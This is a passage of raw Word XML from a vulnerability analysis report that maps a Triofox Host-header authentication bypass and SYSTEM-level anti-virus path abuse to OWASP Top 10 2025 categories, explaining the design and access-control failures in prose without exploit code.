          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No dependency or build-chain compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Not implicated in this CVE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No injection in the documented chain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secondary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trust-boundary and privileged-feature design.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contributory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authentication bypassed, not broken.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Software or Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No integrity-verification failure shown.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security Logging &amp; Alerting Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secondary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Detection worked; prevention and native logging did not.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mishandling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Not implicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>7.2  A01:2025 Broken Access Control (primary)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Access Control remains number one in 2025; every tested application in the contributing dataset exhibited some form of it, and the category maps 40 CWEs including CWE-284, the exact weakness assigned to this CVE. OWASP's own description of the category lists, among its failure modes, bypassing access control checks by modifying the URL or request state, and privilege escalation such as acting as an administrator while unauthenticated. The Triofox flaw is both at once. An unauthenticated remote user modified request state, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> header, to bypass a check and reach administrator-only functionality, then became an administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The mapping is definitional, not approximate. CanRunCriticalPage was the access control, and it failed in the way the category describes: enforcement ran where an attacker could influence it. OWASP's first prevention recommendation for A01, that access control be enforced in server-side code the attacker cannot modify, is precisely the control that was missing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>7.3  A06:2025 Insecure Design (secondary)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Two aspects of the incident are design problems rather than coding mistakes, which places them in A06. Insecure Design, which maps CWE-501 Trust Boundary Violation among others, concerns controls that were never designed in, as distinct from controls implemented incorrectly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The first is the trust boundary itself. Treating </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host == localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a proxy for “request originated locally” is a trust boundary violation in the CWE-501 sense: data from outside the boundary, a client header, was trusted as though it had come from inside. No amount of careful coding of that check would have made it safe, because the design placed trust in the wrong place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The second is the privileged feature. Running an operator-supplied executable path as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, reachable from a web-configurable setting, is a design that assumes the configuration surface is always trustworthy. A least-privilege design, in which the scanner runs in a reduced-rights context or validates the executable, would have limited the blast radius even after the access control failed. OWASP's guidance for A06, threat modelling of authentication, access control, and key flows, is aimed squarely at catching assumptions like these before they ship.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A note on where this stops. One could argue the anti-virus abuse is really an injection or an unrestricted-upload problem. The evidence does not support stretching it into A05; nothing in the chain injected code into an interpreter through unsanitised input. The attacker configured a feature to run a file and then supplied the file, which is a design and authorisation issue, not injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>7.4  A02:2025 Security Misconfiguration (secondary)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
